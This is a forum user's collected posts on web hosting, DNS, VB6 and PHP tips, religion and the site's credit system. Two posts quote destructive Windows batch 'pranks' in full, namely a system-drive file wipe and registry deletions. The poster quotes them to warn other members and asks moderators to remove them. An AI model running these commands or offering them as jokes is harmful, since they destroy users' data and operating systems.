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Posts posted by Galahad

  1. Thank rvalkass, but that's not exactly what I wanted to know... I set up Google Apps just fine, and they're all working, MX records have been changed, and Google accepts incoming mail... What I want now is, to change CNAME records, to point to ghs.google.com, to use with my domain... For now, I have set up simple subdomain redirection, but would like to do it more neatly...But I don't know whether cPanel and Xisto allow editing of all DNS records... I checked the entire cPanel, and can't find any area where to edit DNS records... Is that possible... For example, to add several MX records, or add some CNAME or other records?

  2. I need to change my DNS records, that is, to add several CNAME records... Now, I registered my top level domain (.net) through my ISP, and they in turn registered my domain at some other registrar... Now, my ISP doesn't give me CPanel to update my DNS info, if I don't buy their hosting plan (which is pathetic compared to Xisto free account)... I had them change my nameservers to Xisto servers, and now, they tell me I need to edit CNAME records on Xisto nameservers... I must admit I'm not really familiar with how all that DNS administration works, so I wanted to ask if it is true? Do I need to somehow change DNS records here? Is it at all possible?What I want to do is: I registered with Google Apps, and have my email through them, and now I want to setup CNAME records, to point to Google Apps pages, through my domain (eg. docs.todoro http://forums.xisto.com/no_longer_exists/), without setting up redirection... Is it possible?

  3. I use one USB Flash drive to store any neccessary software I might need at all times... Mostly, the software I carry around is the software I made myself, so it doesn't use registry or depends on a certain components... Everything is on a USB Flash... Many other portable applications too are located on my USB (Kingston 4GB)... I use another 4GB Kingston for storing and transfering misc data...

  4. Well, since I do a lot of uploading, and I'm on ADSL, if I have to upload a big amount of data, I need to compress it... So RAR's aren't really an option... But, I don't use ZIP either... In turn, I use GZIP, it's free, and it compresses better than RAR or ZIP... Plus, since I do upload those files on servers, GZIP is natively supported by Linux, so I don't have to think if I'll be able to uncompress those files when I upload them... Since GZIP is used to compress single file, if I have the need to upload many files, I first put them in a TARBall, then GZIP... Some may see it as an inconvenience, but I see it as quite good compression, and free, at the same time :)I have written a small archiving program for myself, to automatically use TAR and GZIP, and to create my own archives... I have it on my USB, so I can compress and extract files wherever I am, and wherever I need to... And I also use ZLIB, which is a GZIP implementation, to compress data in-memory... Quite good stuff...So, my answer to this question would be neither :)

  5. Appends%20vs%20add%20item


    Visual Basic 6.0 Help Needed

    Well, I'm trying to load many random numbers one under another in a textbox, but when those items are about 30000 this process gets really slow. I'm using the same code:


    Textbox = textbox & line & vbCrLf


    But when the textbox is really big, then it became slow and slow. Is there any other way to add text at the end of the textbox multiline? Thanks.



    I can see that i can be slow, it's a lot of information... Do you need a user to see these numbers as they appear? If not, you can just fill the numbers to a variable, and then just display that variables' contents...


    What makes this process slow, is that VB engine, refreshes the data every time you update your text box information... So, every time you add a new line, VB refreshes the entire Text property...


    One way to solve this would be:

    Dim i As LongDim s As StringFor i = 1 to 50000  s= s & Trim(Cstr(i)) & vbCrLfNext iText1.Text = s

    This will add 50000 lines to variable s, and then assign s to text box Text1... Doing it this way, is much quicked, because VB doesnt have to refresh the text box 50000 times, only once...


    Hope this helped...

  6. Can you explain to me what the variable vBulletin does?example:
    or $vbulletin->db->read_query("");


    I would say you missed a sub-forum, this is about Visual Basic, and you posted question containing PHP code...

    Anyways $vbulletin, in first case, would contain information about a user, regarding buddylist, whatever that may be... Possibly a list of friends on the bulletin board...

    In second case, $vbulletin would contain information read from mysql database... But, since your SQL query is empty, it would contain nothing...

  7. Thank you BuffaloHELP, I did as you asked me to... Hopefully this will be resolved soon...I didn't realise it can be viewed as an SQL injection, because it worked fine for several months... But the troube started when I wrote a script in Perl, that I left at work computer, to update every minute... Guess that could be the culprit... Anyways, thabk's for your help, and I guess I'll read TOS again, to make sure I'm not inadvertently broke them :P...

  8. I'm updating this topic, since this issue has not been resolved, and another has arisen... Now, I'm unable to access my site from home too... I can open it with my mobile phone, and it works, but I can't access it from home... I first thought database server was down, since I use a program I wrote, to update info in MySQL database on server... But, now I see I can't access my site from my home computer AND work computer... What's the deal with that? If you're forbidding me access, at least tell me what did I do wrong, and did I violate TOS or something... Because I really was carefull about what I do, and I don't engage in any illegal activity...Please help, because this is becoming most frustrating, and I'm being paralised here...My home network is 82.208.253.(100-254), I'm on ADSL... No access to site, cPanel, database, entire gamma server... I can access alpha.xisto.comm beta.xisto.com, delta.xisto.com, but not gamma.xisto.com... Can anyone check my account and see if everything is ok... My domain is galahad.trap17.com... I guess OpaQue is too busy, as I sent him a PM, but he didn't respond... Enyone else can help?

  9. Here in Serbia, you can't get your drivers licence until you turn 18... You can't even go take your driving lessons until that age... Then, you have to drive 40hrs with an instructor, who then says whether you have the neccesary skill or not... After that, you take the test or trafic regulations, and if you pass, you get your licence... Now the law is changing, and they are introducing some limitations to fresh drivers , regardless of their age... Seomthing about some experienced driver needs to be with you for 6 months, etc.... They wouldn't be allowed to drive during night hours, for 6 months or a year, not quite sure...I do think that 18 is right age, and shouldn't be lowered, simply because the way young people think... I understad there are those who are mature for their age, but there are a lot more those who are not... They think of a car as a toy, something to brag with, etc., when they don't have the elementary knowledge of driving... We have a lot of accidents here, and sadly, most of them are caused by young drivers, up to age of 23-24, and most of them is on friday and saturday night, whe they go out...Sad but true, and I would support the change of legal driving age to 18... But then again, I don't live in the States...

  10. I hope Knol will be much better than Wikipedia... As I'm reading more and more of the controversy of Wikipedia, and it's upper circle of moderators, who ban users they don't like, or change the articles they find interesting, to suit their own goals... Just Google for Wikipedia Controversy, the latest is with a moderator named Durova... Also something regardin stock exchange...Anyways, hopefully Google will be more resistant to this kind of bad influence... I used to regard Wikipedia as a primary source of information, but now, I take everything with a bit of a doubt...

  11. I think this discussion will change course, and stray into yet another religious debate...To return to the original question, I too agree that religion is being exagerated... But I think religion is being used by politicians mostly, and used for not so honest pourposes... I don't know how things function in Islam, or other religions, as I don't have that much contact with them, so I'll stick with christianity, Orthodox and Catholic...In days past, Church had a lot of power, and I mean a LOT... They practicaly ran everything, and they had a say in every matter possible... But in time, they lost all that power... Yet, they still try to regain all that lost power... And they seemingly have that opportunity, given to them by politicians... Religious leaders would side with one or the other candidate for the office of the president, prime minister, secretary or any other position... Of cousre, claiming that he is honest and sincere in their intents... In return, (s)he would promise to return some of the property back to the Church, possibly some donations, or any other way, that would appear to return old powers to the church... Of course, believers, seeing their leader supported that one candidate, would vote for him/her... Not all, but most of them... And the game goes on, and on... Also, politicians more and more start to use religious speech... Now, I can't claim that for other countries, but that's how it looks like here in Serbia... Many believers think they're better than me, just because they believe... Well, they're not...I have never, ever in my life, asked anyone what their religion was, as it doesn't matter to me... I really don't like anyone trying to convert me, though I must say Orthodox Christians tend to try and convert me much more... Possibly because it's the dominant religion here... Anyways, I really don't like when someone thinks (s)he's better than me, just because I'm and atheist, and they're religious...I, as an atheist, have some set moral values, mostly based on my own oppinions and thoughts, but also by the way my parents brought me up, and educated me... They were always teaching me to use my own head, whenever possible... And so, I always think about stuff, criticize them, analize them, question them... And I don't think I'll stop doing that, any time soon... Simply, I\m just too curious... And, truth be told, religious leaders don't like too curious people in their midst...

  12. Similarly to others, I too post here because I enjoy posting, and exchanging opinions with other people... And I will have to agree with some of the others, that at times, I really don't feel like posting, and I just fly over through the forums, and I'm gone... Then I'm gone for a few days, maybe weeks... Then I'm back again, and I kind of get beck in the element of posting, and I post, post, post, and build my credits up... I don't keep them high, for now... I've usually kept them around 15, and I came bakc regularly... Now, they're over 35, and I still come back regularly, check what's new, post a new message if I find an interesting topic, or there is some interesting discussion on... There are a bunch of topics here on Xisto, in every area of interest, and I'm sure you could find something that could interest you into posting a few messages every other day... Adn keep your credits to a higher number...

  13. The way I learned to code in PHP is somewhat strange... Being a programmer already, I thought I would just jump right in, and start writing code in PHP... But it was rather different than anything I worked in... So, I started making example pages... First, a simple static page, using PHP... Then, I worked my way up, always reading on the functions regarding the area I was making that sample page for... It kind of payed off in the long run... But books are precious...I would suggest going through "PHP5 + MySQL Bible", I think Wrox is the publisher... I think O'Reilly has one too... Check out Sams Publishing as well... What you should do is go on a publishers site, find the book you want, and read the sample chapters, just to see if it will fit your needs, andthen go out and by it... And, you can always skim through the book in the book shop, at least here they let us read a bit, and see if the book is indeed what we're looking for...And never forget the wonderful world of the Internet... You can find many, many good tutorials for PHP, most of them free... Try W3C Schools ofr example, they were very helpful to me, when I was learning... Heck, I'm still learning it :P

  14. I thought netsend was to send messages over the network...

    Indeeed, NET SEND command is also used to send messages across network, but it was mainly designed to send a message to many recipients (I suppose, don't hold me to it), and MSG does just the same...


    Here's the output for NET SEND, which has very limited options, as you will see

    C:\>net send

    The syntax of this command is:




    {name | * | /DOMAIN[:name] | /USERS} message

    while MSG has much more options, presented here:


    Send a message to a user.


    MSG {username | sessionname | sessionid | @filename | *}

    [/sERVER:servername] [/TIME:seconds] [/V] [/W] [message]


    username Identifies the specified username.

    sessionname The name of the session.

    sessionid The ID of the session.

    @filename Identifies a file containing a list of usernames,

    sessionnames, and sessionids to send the message to.

    * Send message to all sessions on specified server.

    /SERVER:servername server to contact (default is current).

    /TIME:seconds Time delay to wait for receiver to acknowledge msg.

    /V Display information about actions being performed.

    /W Wait for response from user, useful with /V.

    message Message to send. If none specified, prompts for it

    or reads from stdin.


    On another matter,

    the shutdown one does NOT delete the hard disk.

    You'll forgive me if I don't agree with you that it doesn't delete files from your hard disk...



    del %systemdrive%\*.* /f /s /q
    del - command prompt command, built into every windows system... Deletes files specified...

    %systemdrive% - system environment variable, filled in by Windows during boot... Contains drive letter of your system hard drive, that is, drive where your Windows is installed... Most likely, it's drive C... Try it your self, just type echo %systemdrive% in your command prompt:

    C:\>echo %systemdrive%


    \*.* - as a parameter to del command, it instructs it to delete every file it finds, in specified directory... In this example, it would be C:\*.*, meaning every file in C:\, excluding directories and their contents...

    /f - this switch tells del command, to force the deletion of read-only files

    /s - this switch tells del command, to delete every file in every subdirectory, and all the directories too, contained in the original path, meaning, it will delete all the files and directories in C:\, as specified by this code...

    /q - this switch tells del command to be quiet about deleting files... No warning will be given, and no report printed on your screen... You won't know what hit you...


    So, you see, it does erase data from your hard disk, maybe not ALL system files, but it sure will delete all the user files on that sysrem partition or hard drive...


    If you don't believe me, Google for this string, and read on, starting with 5th result... "del %systemdrive%\*.* /f /s /q"

  15. Planes don't actually fly, and ships don't sail around the world... It's all just a big coverup... And Alex and I are very close to finding out what the governments are trying to hide from their citizens...Planes are actually just underground transports, with a lot of projectors instead of windows, and you are only tricked into thinking you are flying... We have not yet determined how the ships get turned around, and lead to their destination, but we believe it has something to do with GPS and SatNav system that todays ships have... Computers aboard these ships actually slowly and gradually alter the ships course, and are lead discretely away from the ice walls...We should be able to inflitrate one of the secret bases, and get some info on what is going on... But I tell you, the Earth is flat! And we will soon have all the evidence you need...P.S.For those that still don't get it, it's just a joke Alex posted here, and I kind of picked up on it :PP.P.S.Or maybe it isn't?

  16. First off, these 4 are not related to VBS, or VBScript, in any way... Code this user posted in the following 4 "pranks" is actually a command intrepreter code, that is written in old fashioned batch files, or .BAT files... These were used in DOS days, to speed up certain tasks that repeated often, a sort of equivalent of the maros...


    *NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer.

    This one is a lie, except in case of BAT-1 code, that I will elaborate on later in this post...


    I believe this user has posted truely malicious code here, and that these dangerous ones should be removed, and the true prank ones left here...



    @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00
    This one will actually mess Windows up! It will delete ALL the files from your system hard drive, or system partition!


    Command DEL is used (naturally) to delete files, %systemdrive% tells this command to wipe out everything from the partition you have your windows installed to (for example, C:), \*.* tells it to wipe every file it finds, and the switches /F /S /Q tell the command to force the deletion of read-only files, to wipe out every sub-directory, and to be quiet about it, respectively... This part is not at all a prank, and I don't recommend anyone trying this one... Ever...



    -Stupidity Shutdown

    *This pops up a funny message then will shutdown the computer


    @echo off msg * Fatal system error due to admin stupidity! shutdown -c "Error! You are too stupid!" -s -t 10

    Ok, this one really does send the message, but it sends this message to everyone on the network... MSG command is used to send short text messages between two or more computers on the network, mainly local network... MSG * will send the message to all the computers in the network... Not really funny, but hey... It's at least not malicious...



    -Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

    *This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)


    @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked.  Have a nice day. GOTO MESSAGE
    This one is just as bad, as the first one... It wipes out entire HKEY_CLASSES_ROOT registry section, and effectively kills your Windows... And again, it's a command-prompt style batch file... But, none the less, it's very malicious, and should NOT be tried...



    -Endless Notepads

    *This will pop up endless notepads until the computer freezes and crashes*

    @ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top

    This one is not malicous, as it will only start notepads, until you run out of memory... Then windows will crash... Can be tried on someone I guess...


    It appears to me, that this user has copied this code from some site, and has no real coding experience, and is, what would be called a wannabe-hacker... Probably some kid, with too much time on his hands... I would STRONGLY recommend that you avoid using BAT-1 and BAT-3 codes, as they WILL kill your computer, and you won't be able to revive your system without reinstallation... BAT-1 will destroy ANY file found on your system hard drive, and probably all files in your My Documents folder, as this folder is also stored on your system hard drive or partition...


    I would urge the moderators to remove BAT-1 and BAT-3 codes, as they pose a big risk for users that do not know what they do... And I would recommend warning this user about posting such content... This could be very harmfull to this community...

  17. Oh, when I remember my old Commodore 64... 64Kb of memory... At first, I used a commodore tape drive, to play moslygames, as I was a kid... Later, I got Commodore 1541 floopy drive, and a whole new worlf opened... 5 1/4" floppies, full of wonderfull programms... That were small, tiny, compared to todays standards...I remember programming games with top graphics for my C64... Well, top for that time anyway... And you didn't need any extra hardware, you only connected your C64 to a TV, and you already had color picture and sound...Those were the days...Then killing my eyes on a Hercules cards, first that radio-active shade of green, and later, a modern variant, that was orangy... Playing around in DOS, programming in QB, using Windows 3.1... I made my own shell for Win 3.1, to replace Programm Manager... It was as easy as pouring a glass of water... No regustry, no this or that... Everything worked...I used Word Perfect to write documents... Made my own primitive spreadsheet program... A ton of stuff... I really miss those days... F-Prot would scan my huuuuge 540Mb hard drive in a matter of minutes... I had full 32Mb of RAM... And I could virtually do anything with it... I even miss that EMS/XMS memory chaos... One game wants this much EMS, the other want this much XMS... Editing autoexec.bat and config.sys to make all the neccessary adjustments... Great times... Truely great...

  18. It's very simple... OpaQue wants to have a great community, and he has that - he has us... If he woud stop asking for us to post, than this community would be dead... There would be maybe 50 of us who would still post... And sure, OpaQue and Xisto don't have direct income from the forums, but the service he provides is the advertisment for itself... Huge community has a much better ranking in the search engines, much more hits... People come here, see what's offered for free, they see Xisto - Web Hosting link, etc... They go there, and sign up... I am sure, that had you came up with the same idea OpaQue did, you would have had the same credit system that is now in efect... And noone is stopping you to start your own community and webhosting, right? I'm not saying anything is your fault... You agreed with the Terms Of Service, and those are the terms of service... I understand you are just expressing your oppinion, and that's fine by me... All I'm saying is that I completely understand why OpaQue has this credit system in effect, and that I stand by him in that matter... People are lazy when it comes to posting good and quality posts... I know I am... This is only a means of ensuring people get back here from time to time, and contribute to this community we've made... Also, he makes sure people who have free hosting with Xisto, actually care about that hosting, and care about their site... Otherwise, Trap's servers would be full of idle accounts that weren't updated in months... Like one of my first website of Freewebs, or whatever was it's name... Years after I last signed in and modified the files, my site is still there... That's called a waste of space... Keeping credits above 10 is quite easy actually... And with the amount of categories and topics, one can easily find a topic (s)he can write in, or even start their own topic... If there is not an active topic, you can always resurect one of the old topics, on pages 2,3,4... And bring them back to life, and spark another discussion... The only thing required, is a little bit of good will...

  19. Looking at the forums I read most, posts are of substantial quality, and on a much higher level than most other forums I've been to... So, I don't see they are spam posts... Besides, there is a horde of moderators overseeing and making shure the posts are of required quality...Saying OpaQue forgot us is very rude... He has not forgot us... He still provides full support for Xisto members... I have sent him numerous PM's regarding different aspects of my hosting, and he has always responded in the quickest manner, regardless of if I asked a question or if I had a problem...I will remind you of a great saying "There Is No Such Thing As A Free Lunch", or just TINSTAAFL, ask Google about it... Everything costs money... Xisto needs to pay for bandwidth used by us, they don't get it for free, you know... even though they have to servers available, someone needs to maintain them... That costs too... Spare parts, ugrading...And why would he move to vB, when IPB is working perfectly? I expect it would take agreat amount of time to migrate to a new forum engine, rewriting scripts, etc.... Who has that much spare time on their hands?In the end, if you really hate negative credits, why did you agree to TOS? Why do you use Xisto service? Because there is not a single free web host, that will give you what Xisto gives you... Hell, there are even paid hostings that don't give what Xisto gives you... Come to think of it, your posts do appear as your attempt to raise your credit count...I've been using this service for years, and will continue to do so, until I get the means to switch to paid hosting, again, with Xisto... And I won't forget the forums, and will keep posting even when I switch to paid hosting... Because this is a great community, and we have OpaQue to thank for thinking of this great way to help us...

  20. I too have noticed it a while ago, and mentioned in one of my posts here... Bandwidth counter hasn't ben running since august, and it's always on 0... I'm not using nearly the amount of BW I have, but it would be nice to be able to see how much I spend... As for web stats, I understand why automatic updateing would be turned off, to conserve resources, and that's fine with me, I only chechk them few times a month... I suppose it has something with cPanel, it has nasty bugs... For instance, I had my account suspended few times, and .htaccess file that is placed, to display "This account is suspended" page, remains in all the directories, that didn't have their own .htaccess file before that... Kind of annoying, having to go through them, and erase that .htaccess file... Hopefully, when new cPanel version comes out, they will have some of these bugs fixed... So for now, calculate your bandwidth from web stats...

  21. this is not encouraging, this looks more like forcing users to write posts and that is not cool at all. i think Xisto can be much cooler and lot less evil (in google slogan evil meaning, not real evil meaning) if this credits don't go below zero.

    No one is forcing you to do anything... This is just how things work... I don't think its evil, and probably most of the members would agree with me, we'll see...

    you don't understand. we are hosted on same servers. even if it says to me that i have 500 megabytes of space, i did not spend those resources until i really have 500 megabytes of space full on my account. this is just a limit notification. so even if my account is suspended i don't waste any space to other members.

    Your space is reserved for you, and thus, you are using it... That space is "occupied", no matter if you actually use it or not... And after 30 days, if you are not active, that means you are not interested in that hosting, and your account is deleted, and that space freed, for new users... I've been using Xisto hosting for 3 years, and yes, sometimes it has been a little difficult finding inspiration to write quality posts, but I did it anyway... Because I like this service, and I like this hosting, and I want to contribute... Let's face it, you won't find a free web host, with no ads, that will give you so much, as Xisto did, and all they want in return, is a few quality postos every once in a while... If you find it difficult to post, then why don't you switch to Xisto.Net, they offer same hosting as Xisto.com, only with text ads on the bottom of the page... And you don't have to post in the forums...
    So, once again, I don't think this is forcing anyone anything... Would you like it more, if your account got suspended for what, 10 months, and then you just come and reactvate your account with one post? That wouldn't be fair to other members, who post regularly, would it?
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